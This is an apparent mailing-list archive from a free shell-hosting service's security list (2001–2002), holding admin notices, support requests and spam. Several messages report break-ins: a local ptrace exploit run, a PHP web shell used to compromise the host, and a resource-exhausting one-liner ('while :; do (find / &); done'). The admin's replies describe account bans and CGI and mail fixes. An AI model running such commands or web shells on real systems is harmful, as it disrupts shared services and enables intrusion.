./epcs2 >ptrace: PTRACE_ATTACH: Operation not permitted >d0h! error! >ozzy@gate~/hack$ date >Thu Sep 20 03:20:32 CEST 2001 >The source of the local exploit is /home/o/ozzy/hack/epcs2.c >Works the first time only after system reboot. >Actually it is for slackware but obviously works on RedHat 7.1. >^_^ >Best wishes! > Ventsislav Nikolov >_______________________________________________ >Security mailing list >Security@polarhome.com >http://www.polarhome.com/mailman/listinfo/security From traderc@mail.ru Mon Sep 24 00:34:47 2001 Received: from mx4.mail.ru (mx4.port.ru [194.67.57.14]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8NMYkP24607 for ; Mon, 24 Sep 2001 00:34:47 +0200 Received: from mx6.port.ru (mx6.int [10.0.0.42]) by mx4.mail.ru (8.11.3/8.11.1) with ESMTP id f8NFJ8138439 for ; Sun, 23 Sep 2001 19:19:08 +0400 (MSD) Received: from f12.int ([10.0.0.85] helo=f12.port.ru) by mx6.port.ru with esmtp (Exim 3.14 #1) id 15lB2C-000NEN-00 for security@polarhome.com; Sun, 23 Sep 2001 19:19:08 +0400 Received: from mail by f12.port.ru with local (Exim 3.14 #1) id 15lB2B-000I6x-00 for security@polarhome.com; Sun, 23 Sep 2001 19:19:07 +0400 Received: from [62.217.133.22] by win.mail.port.ru with HTTP; Sun, 23 Sep 2001 15:19:07 +0000 (GMT) From: "cool trader" To: security@polarhome.com Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: [62.217.133.22] Date: Sun, 23 Sep 2001 15:19:07 +0000 (GMT) Reply-To: "cool trader" Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Message-Id: Subject: [Security] (no subject) Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: Dear Polarhome ! I`ve got some questions! It really nice that you provide such servives for free! If i have domains can make them as vhosts on bnc using your shell ? Thanx and best wishes Anar! From arpadffy@polarhome.com Mon Sep 24 01:18:45 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8NNIjP06724; Mon, 24 Sep 2001 01:18:45 +0200 Message-ID: <001901c14487$2e849880$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "cool trader" , References: Subject: Re: [Security] (no subject) Date: Mon, 24 Sep 2001 01:26:33 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, thanks a lot, but we have just one IP (with DHCP) that we can not use for vhosts... regards, Z Give us leased line with few IP addresses, the you will get vhosts. Regards, Z ----- Original Message ----- From: "cool trader" To: Sent: Sunday, September 23, 2001 5:19 PM Subject: [Security] (no subject) > Dear Polarhome ! > I`ve got some questions! > It really nice that you provide such servives for free! > If i have domains can make them as vhosts on bnc using your shell ? > Thanx and best wishes Anar! > _______________________________________________ > Security mailing list > Security@polarhome.com > http://www.polarhome.com/mailman/listinfo/security From arpadffy@polarfox.com Mon Sep 24 01:21:04 2001 Received: from www3.aname.net (www3.aname.net [194.18.94.103]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8NNL3P06842 for ; Mon, 24 Sep 2001 01:21:03 +0200 Received: from sea (h229n2fls31o873.telia.com [213.66.228.229]) by www3.aname.net (8.11.6/8.11.3) with SMTP id f8NL4as31085 for ; Sun, 23 Sep 2001 23:04:39 +0200 Message-ID: <012001c14474$72ff17a0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: Date: Sun, 23 Sep 2001 23:12:23 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] exploit #3 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: gate.polarhome.com fall first time. To: arpadffy@polarfox.com From: root@hackermuda.org Subject: Re: I've been hacked ... i am using script called phpshell.php that i modified into my language you can read about the script explanation at http://www.gimpster.com/php/phpshell/index.php i put it at my home directory /home/d/dookie/public_html with named test.php then ill open it from browser http://www.polarhome.com/~dookie/test.php the script works thats all ... God bless, rahul-x From arpadffy@polarhome.com Tue Sep 25 00:22:16 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8OMMCP14539; Tue, 25 Sep 2001 00:22:16 +0200 Message-ID: <011201c14548$760845a0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "cool trader" Cc: References: Subject: Re: Re[4]: [Security] (no subject) Date: Mon, 24 Sep 2001 23:42:47 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, > Please review the following site if the are any solutions possybilities using such servise: > http://www.no-ip.com no problem, from my side... but seems this update client is not safe enough (have you read news??) I will dig into it a bit... and come back later. Very important note: please do not base any important application, content etc on polarhome.com hosts. I can not guarantee 24/7 uptime, content security... polarhome.com is just one non commercial effort to shell popularization and education. It is not a commercial site that have measures, norms and 99.99% uptime. polarhome.com can close without any warning one day when I run out of patience, money, resources or whatever... it is an one-man-one-dream project. Please, keep that in mind when you make big plans. Regards, Z From usdl@the-pentagon.com Thu Sep 27 00:05:17 2001 Received: from greekemail.com ([208.133.128.112]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8QM5Ab04176 for ; Thu, 27 Sep 2001 00:05:16 +0200 Received: from the-pentagon.com [192.168.1.24] by greekemail.com (SMTPD32-6.00) id A457FA00D2; Wed, 26 Sep 2001 17:37:46 +0100 Message-ID: <11478200193262229365@the-pentagon.com> X-EM-Version: 5, 0, 0, 4 X-EM-Registration: #01E0520310450300B900 X-Priority: 3 X-Mailer: My Own Email v4.00 From: "Um Sonho De Liberdade" To: security@polarhome.com Date: Wed, 26 Sep 2001 17:02:09 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Subject: [Security] [no subject] Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: Hi, i have account in polarhome.com. Shell telnet is incapacitated? _____________________________________________ Free email with personality! Over 200 domains! http://www.MyOwnEmail.com From a_d@luxadmin.org Fri Sep 28 05:38:11 2001 Received: from luxadmin.org (pppoe60-luxdsl-111.pt.lu [213.166.60.111]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8S3c9b25737; Fri, 28 Sep 2001 05:38:10 +0200 Received: by luxadmin.org (Postfix, from userid 1102) id 4C796E78C4; Fri, 28 Sep 2001 05:07:27 +0200 (MEST) To: root@polarhome.com Cc: security@polarhome.com Message-Id: <20010928030727.4C796E78C4@luxadmin.org> Date: Fri, 28 Sep 2001 05:07:27 +0200 (MEST) From: a_d@luxadmin.org Subject: [Security] i hacked u Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: i found a certain "hole" which sucked all your machine power.. and give this error to any user Resource temporarily unavailable this was made by doing this while :; do (find / &); done hope this helps improve your security and that wil give me certain priveleges on polarhome From nobody@mailbox.gr Fri Sep 28 06:14:55 2001 Received: from mailbox.gr (mailbox.gr [216.121.96.103]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8S4Esb02308 for ; Fri, 28 Sep 2001 06:14:54 +0200 Received: (from nobody@localhost) by mailbox.gr (8.9.3/8.9.3) id HAA13792; Fri, 28 Sep 2001 07:16:13 +0300 Date: Fri, 28 Sep 2001 07:16:13 +0300 Message-Id: <200109280416.HAA13792@mailbox.gr> To: security@polarhome.com Cc: From: "kernel kernel" Subject: [Security] plz helpME Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi. one Question: 1) How to can upload & run eggdrop1.6.6 to my home directory(pwd=~nestus)? plz help me. 2) What is file to my home directory "eggdrop.conf" ? Thanks. http://www.mailbox.gr ÁðïêôÞóôå ÄùñåÜí ôï Ìïíáäéêü óáò Å-mail! From arpadffy@polarhome.com Sun Sep 30 10:42:51 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8U8gcb01245; Sun, 30 Sep 2001 10:42:51 +0200 Message-ID: <010401c1498d$00fbc180$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: Cc: References: <20010928030727.4C796E78C4@luxadmin.org> Date: Sun, 30 Sep 2001 10:42:41 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Subject: [Security] Re: i hacked u Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, If you read carefully the hack rules... you can find that fork attacks are not counting and specially if you what to paralyze the system. You did run the script... therefore your account has been disabled with all your network/hosts. This is not a right way to achieve higher privileges... sorry. regards, Z ----- Original Message ----- From: To: Cc: Sent: Friday, September 28, 2001 5:07 AM Subject: i hacked u > i found a certain "hole" which sucked all your machine power.. and give this error to any user Resource temporarily unavailable this was made by doing this > while :; do (find / &); done hope this helps improve your security and that wil give me certain priveleges on polarhome From m3rlin@abv.bg Tue Oct 2 06:24:29 2001 Received: from webmail.gyuvetch.bg ([194.153.145.78]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f924OSb05696 for ; Tue, 2 Oct 2001 06:24:28 +0200 Received: (qmail 18866 invoked from network); 1 Oct 2001 21:17:42 -0000 Received: from abv1.ni.bg (HELO abv.bg) (192.168.151.20) by oas.netinfo.bg with SMTP; 1 Oct 2001 21:17:42 -0000 Received: (qmail 27207 invoked by uid 99); 1 Oct 2001 21:17:39 -0000 Message-ID: <20011001211739.27206.qmail@abv.bg> From: "Vasil Medarov" To: Date: Tue, 02 Oct 2001 00:17:39 +0300 MIME-Version: 1.0 X-Mailer: WebMail 2.0 (abv.bg) Content-Type: text/plain; charset=windows-1251 Content-Transfer-Encoding: 8bit Subject: [Security] Vhost Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: Hello :( I have a big problem :(( I need to help me because i cant use your shell ... :(( Really your hosts are G- lined :(( At UniBG network ... Or sure i Say baned -irc.otel.net- *** G-lined - -irc.otel.net- *** Banned: flood shell (2001/10/01 15.06) look :(( some stupid gay is use your shell to flood :(( ... and now I cant use your services.. i m not good whit english but I think you understand me pls do something because I can chat only there ... :( I m waiting you Anser pls . ----------------------------------- Ãëàñóâàé òóê çà íàé-äîáúð ñàéò çà îí-ëàéí óñëóãè â ðàìêèòå íà êîíêóðñà BG Web Awards 2001. http://bgsite.zonebg.com/light.php?search=www.abv.bg From superisterico@libero.it Tue Oct 2 07:56:46 2001 Received: from smtp2.libero.it (smtp2.libero.it [193.70.192.52]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f925uhb20064 for ; Tue, 2 Oct 2001 07:56:45 +0200 Received: from istericor0x (151.21.137.132) by smtp2.libero.it (6.0.021) id 3B9C90110061E858 for security@polarhome.com; Mon, 1 Oct 2001 19:50:39 +0200 Message-ID: <000801c14aa1$5a0d5da0$84891597@istericor0x> From: "ISTERICO" To: Date: Mon, 1 Oct 2001 19:48:59 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C14AB2.1CD5EAE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Subject: [Security] protesta. Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C14AB2.1CD5EAE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Salve.Sono un vostro utente iscritto al vostro servizio.Non riesco a = telnettare con il vostro server per sistemare il mio bnc.Mi dice la = maggir parte delle volte Login incorrect,mentre la password =E8 = giusta.Ho provato anche con altri account ma nulla.sempre lo stesso = errore.Oggi invece mi dice sempre "connessione all'host perduta". =E9 il = server che ha problemi o =E8 il mio pc,il mio telnet? Grazie dell'ascolto. Attendo risposte. ------=_NextPart_000_0005_01C14AB2.1CD5EAE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Salve.Sono un vostro utente iscritto al = vostro=20 servizio.Non riesco a telnettare con il vostro server per sistemare il = mio=20 bnc.Mi dice la maggir parte delle volte Login incorrect,mentre la = password =E8=20 giusta.Ho provato anche con altri account ma nulla.sempre lo stesso = errore.Oggi=20 invece mi dice sempre "connessione all'host perduta". =E9 il server che = ha=20 problemi o =E8 il mio pc,il mio telnet?
Grazie dell'ascolto.
Attendo = risposte.
------=_NextPart_000_0005_01C14AB2.1CD5EAE0-- From arpadffy@polarhome.com Tue Oct 2 14:16:48 2001 Received: from sea (sea.polarhome.com [192.168.10.9]) by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f92CGmb19133; Tue, 2 Oct 2001 14:16:48 +0200 Message-ID: <003801c14b3d$3bca81a0$090aa8c0@polarhome.com> From: "Zoltan Arpadffy" To: "ISTERICO" , References: <000801c14aa1$5a0d5da0$84891597@istericor0x> Subject: Re: [Security] protesta. Date: Tue, 2 Oct 2001 14:24:09 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0029_01C14B4D.E6618400" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format. ------=_NextPart_000_0029_01C14B4D.E6618400 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable hi, If you take it in English maybe we can help you... Regards, Z ----- Original Message -----=20 From: ISTERICO=20 To: security@polarhome.com=20 Sent: Monday, October 01, 2001 7:48 PM Subject: [Security] protesta. Salve.Sono un vostro utente iscritto al vostro servizio.Non riesco a = telnettare con il vostro server per sistemare il mio bnc.Mi dice la = maggir parte delle volte Login incorrect,mentre la password =E8 = giusta.Ho provato anche con altri account ma nulla.sempre lo stesso = errore.Oggi invece mi dice sempre "connessione all'host perduta". =E9 il = server che ha problemi o =E8 il mio pc,il mio telnet? Grazie dell'ascolto. Attendo risposte. ------=_NextPart_000_0029_01C14B4D.E6618400 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
hi,
 
If you take it in English maybe we can = help=20 you...
Regards, Z
----- Original Message -----
From:=20 ISTERICO
Sent: Monday, October 01, 2001 = 7:48=20 PM
Subject: [Security] = protesta.

Salve.Sono un vostro utente iscritto = al vostro=20 servizio.Non riesco a telnettare con il vostro server per sistemare il = mio=20 bnc.Mi dice la maggir parte delle volte Login incorrect,mentre la = password =E8=20 giusta.Ho provato anche con altri account ma nulla.sempre lo stesso=20 errore.Oggi invece mi dice sempre "connessione all'host perduta". =E9 = il server=20 che ha problemi o =E8 il mio pc,il mio telnet?
Grazie dell'ascolto.
Attendo=20 risposte.
------=_NextPart_000_0029_01C14B4D.E6618400-- From zoltan.arpadffy@essnet.se Fri Oct 19 16:23:13 2001 Received: from essnet.se (fwall.essnet.se [212.209.198.194]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f9JENCM18773; Fri, 19 Oct 2001 16:23:12 +0200 Received: from tfsgw.essnet.se ([194.132.53.235]) by fwall.essnet.se with SMTP id <119043>; Fri, 19 Oct 2001 16:22:32 +0200 Message-Id: From: zoltan.arpadffy@essnet.se Date: Fri, 19 Oct 2001 16:21:22 +0200 To: polarhome@polarhome.com Cc: security@polarhome.com, admins@polarhome.com MIME-version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 X-Mailer: TFS Secure Messaging /300000031/221110291/221041054/221001705/ X-Mailer: Version 4.61 Build 202 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by gate.polarhome.com id f9JENCM18773 Subject: [Security] kernel upgrade Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, this weekend gate.polarhome.com will be rebooted because of kernel upgrade. hope it will solve PAM limit problems. Regards, Z From return@trafficmagnet.net Wed Nov 28 02:10:23 2001 Received: from ns4.trafficmagnet.net ([211.101.236.28]) by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id fAS1ALj25353 for ; Wed, 28 Nov 2001 02:10:22 +0100 Received: from sendmail ([211.101.236.29]) by ns4.trafficmagnet.net (8.9.3/8.9.3) with SMTP id NAA27659 for ; Tue, 27 Nov 2001 13:04:13 +0800 Message-Id: <200111270504.NAA27659@ns4.trafficmagnet.net> From: Christine Hall To: "security@polarhome.com" Date: Wed, 28 Nov 2001 9:11:19 +0800 X-Mailer: CSMTPConnection v2.17 MIME-Version: 1.0 Content-Type: multipart/related; boundary="9e157335-4747-4baa-bcfe-d32d2d0297b3" Content-Transfer-Encoding: quoted-printable Reply-To: Christine Hall Subject: [Security] WWW.POLARHOME.COM Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.6 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format --9e157335-4747-4baa-bcfe-d32d2d0297b3 Content-Type: text/html; charset=iso-8859-1Ì Content-Transfer-Encoding: quoted-printable
Hi

I visited WWW.POLARHOME.COM, and noticed that you're not listed on some search engines! I think we can = offer you a service which can help you increase traffic and the number of = visitors to your website.

I would like to introduce you to TrafficMagnet.net. We offer a unique = technology that will submit your website to over 300,000 search engines and = directories every month.

You'll be surprised by the low cost, and by how effective this website = promotion method can be.

To find out more about TrafficMagnet and the cost for submitting your = website to over 300,000 search engines and directories, visit www.TrafficMagnet.net.

I would love to hear from you.


Best Regards,

Christine Hall
Sales and Marketing
E-mail: christine@trafficmagnet.net
http://www.TrafficMagnet.net
--9e157335-4747-4baa-bcfe-d32d2d0297b3-- From root@gate.polarhome.com Thu Jan 17 12:05:43 2002 Received: from localhost (root@localhost) by gate.polarhome.com (8.11.6/linuxconf) with ESMTP id g0HB5h030463; Thu, 17 Jan 2002 12:05:43 +0100 Date: Thu, 17 Jan 2002 12:05:43 +0100 (CET) From: root To: cc: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: [Security] mailbomb Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, user tools: Login: tools Name: vytenioplas Directory: /home/t/tools Shell: /bin/bash Office: LT, vytenis@kaunas.omnitel.net Last login Wed Jan 16 21:55 (CET) on ftp from 212.47.122.157 with perl CGI script server sms.tele2.dk was mailbombed. I don't really know was it an attack against polarhome or tele2.dk because both servers refused mail requests, creating loop between smtp daemons and applications. Because of this incident perl has been disabled for all users, until we find some secure way to use it. Denied users: tools and Login: perl Name: vytenis Directory: /home/p/perl Shell: /bin/bash Office: LT, vyteniz@centras.lt Last login Wed Jan 16 21:52 (CET) on ftp from 212.47.122.157 Shame on you... I was a chicken attack that hacker can not be proud. root From root@gate.polarhome.com Wed Jan 23 15:52:49 2002 Received: from localhost (root@localhost) by gate.polarhome.com (8.11.6/linuxconf) with ESMTP id g0NEqnS06923; Wed, 23 Jan 2002 15:52:49 +0100 Date: Wed, 23 Jan 2002 15:52:49 +0100 (CET) From: root To: polarhome@polarhome.com cc: security@polarhome.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: [Security] CGI problem solved Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, polarhome found "some kind of solution" for perl and CGI abuse problem. From now on, CGI is enabled just for trusted (shell) users. All other users (with just ftp account) can not execute CGI scripts. More to read about differences between shell and ftp users in shell policy http://www.polarhome.com/service/policy.html How does it work now? We changed the CGI wrapper on FreeBSD and Linux box. Instead of suEXEC we use CGIWrap that allows ACL (access control lists), process and environment limits and CGI debug as well. With this method registered users got a much more open and safer CGI environment, but "anonymous" non registered users lost CGI execution. PHP is available to all users in safe mode. More to read about CGIWrap at http://www.polarhome.com/service/manual/CGIWrap/ Usage: Users can not feel the difference. it is absolutely transparent to users so you can execute your CGI as earlier (in example I will use user Anna's page) CGI extensions at polarhome realm are: cgi, pl, py, tcl Execution: http://www.polarhome.com/~anna/cgi-bin/testcgi.pl or http://www.polarhome.com/cgi-bin/cgiwrap/anna/cgi-bin/testcgi.pl It is possible to debug your script with: http://www.polarhome.com/cgi-bin/cgiwrapd/anna/cgi-bin/testcgi.pl (cgiwrapd instead of cgiwrap in URL) Otherwise it is possible to debug through log files at: http://www.polarhome.com/service/debug/ Enjoy. Z From root@gate.polarhome.com Mon Apr 22 15:54:48 2002 Received: from localhost (root@localhost) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g3MDsm910808; Mon, 22 Apr 2002 15:54:48 +0200 Date: Mon, 22 Apr 2002 15:54:47 +0200 (CEST) From: root To: polarhome@polarhome.com, Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: [Security] Mail problem solved Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, polarhome.com had lot of problem because of abuse of smtp, mail relay and imap, pop3 imaps and pop3s combination on whole environment, therefore during the last month smtp was closed for remote hosts (that use imap, pop3 etc...) and polarhome had been placed to public relay lists. BUT finally after some test period, I am proud to announce that this problem has been solved and introduced one robust and secure solution that allows remote users to send mails, but stop relay and spam through the polarhome smtp mailer. You can read more about the solution at http://www.polarhome.com/service/manual/drac-1.11 or at http://mail.cc.umanitoba.ca/drac/ Thanks Gary Mills from the University of Manitoba Please use it and if you find some problem send it to support@polarhome.com Regards, Z From return@trafficmagnet.net Sat May 4 15:18:09 2002 Received: from ns5.trafficmagnet.net ([211.157.101.51]) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g44DHsl16288 for ; Sat, 4 May 2002 15:18:05 +0200 Received: from 29-Dispatcher ([211.101.236.29]) by ns5.trafficmagnet.net (8.11.6/8.11.6) with SMTP id g453H3B30760 for ; Sat, 4 May 2002 22:17:08 -0500 Message-Id: <200205050317.g453H3B30760@ns5.trafficmagnet.net> From: Christine Hall To: "security@polarhome.com" Date: Sat, 4 May 2002 22:24:14 +0800 X-Mailer: CSMTPConnection v2.17 MIME-Version: 1.0 Content-Type: multipart/related; boundary="74d0c515-961b-435d-8758-de666c1820a8" Content-Transfer-Encoding: quoted-printable Reply-To: Christine Hall Subject: [Security] WWW.POLARHOME.COM Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format --74d0c515-961b-435d-8758-de666c1820a8 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable
Hi

I visited WWW.POLARHOME.COM, and noticed that you're not listed on some search engines! I think we can = offer you a service which can help you increase traffic and the number of = visitors to your website.

I would like to introduce you to TrafficMagnet.net. We offer a unique = technology that will submit your website to over 300,000 search engines and = directories every month.

You'll be surprised by the low cost, and by how effective this website = promotion method can be.

To find out more about TrafficMagnet and the cost for submitting your = website to over 300,000 search engines and directories, visit www.TrafficMagnet.net.

I would love to hear from you.


Best Regards,

Christine Hall
Sales and Marketing
E-mail: christine@trafficmagnet.net
http://www.TrafficMagnet.net
--74d0c515-961b-435d-8758-de666c1820a8-- From reply@seekercenter.net Wed May 22 16:01:11 2002 Received: from tiantang163 ([211.101.236.162]) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g4ME18603588 for ; Wed, 22 May 2002 16:01:09 +0200 Message-Id: <200205221401.g4ME18603588@gate.polarhome.com> From: "Vanessa Lintner" To: security@polarhome.com Content-Type: text/html; Reply-To: "Vanessa Lintner" Date: Wed, 22 May 2002 22:04:12 +0800 X-Priority: 3 X-Library: Business Promotion Subject: [Security] I have visited GATE.POLARHOME.COM and noticed that ... Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive:
 

Hello,

I have visited gate.polarhome.com and noticed that your website is not listed on some search engines. I am sure that through our service the number of people who visit your website will definitely increase. SeekerCenter is a unique technology that instantly submits your website to over 500,000 search engines and directories -- a really low-cost and effective way to advertise your site. For more details please go to SeekerCenter.net.

Give your website maximum exposure today!
Looking forward to hearing from you.

Best Regards,
Vanessa Lintner
Sales & Marketing
www.SeekerCenter.net

     
     
From root@gate.polarhome.com Tue Jun 25 16:01:46 2002 Received: from localhost (root@localhost) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g5PE1k512062; Tue, 25 Jun 2002 16:01:46 +0200 Date: Tue, 25 Jun 2002 16:01:46 +0200 (CEST) From: root To: polarhome@polarhome.com, Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: [Security] two weeks explanation Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: hi, as all of you experienced in the last 2 months gate, the polarhome realm gateway had extremely serious problems with system stability. System just hanged without any log, it was sometimes extremely slow and there were quote lot of other symptoms that I could not find any solution. I've spent lot of time to debug, check, enable/disable services and at the end I come to conclusion that the problem could be connected with NFS that polarhome heavily uses during inter host communication. I thought that might be even hacker attack or some nasty hard disk failure... Finally RedHat announced that some kernel bug is responsible for this behaviour. More to read at http://rhn.redhat.com/errata/RHBA-2002-110.html From now on I will sleep better :) ... and another thing. Even if gate was in very inconsistent state I had to leave it alone for some (exactly 3) weeks. One week I was on business trip (polarhome almost lost it's administrator in Petakh Tikvah explosion in Tel Aviv) and Later on two weeks holiday with family. I promised to my girlfriend: no laptops, no internet cafes during holiday (seems I spend to much time with computers). I kept my word. But now when I know the reason of the problem... I see that I could not make too much (from Poros, Greece) even if I would have access to computer. gate was down, therefore rest of the system was unreachable as well. I am terribly sorry, but I always try to point out that: polarhome is a non commercial (better call it hobby) association of enthusiasts that relay on one person, therefore polarhome users should not expect commercial service quality from polarhome. I and the COPS team and lot of others work overtime without any compensation, just to have a free and nice island on the internet. Hope that polarhome users can accept it as it is. Regards, Z root@polarhome.com From sunpatel1234@hotmail.com Mon Jul 1 15:10:53 2002 Received: from 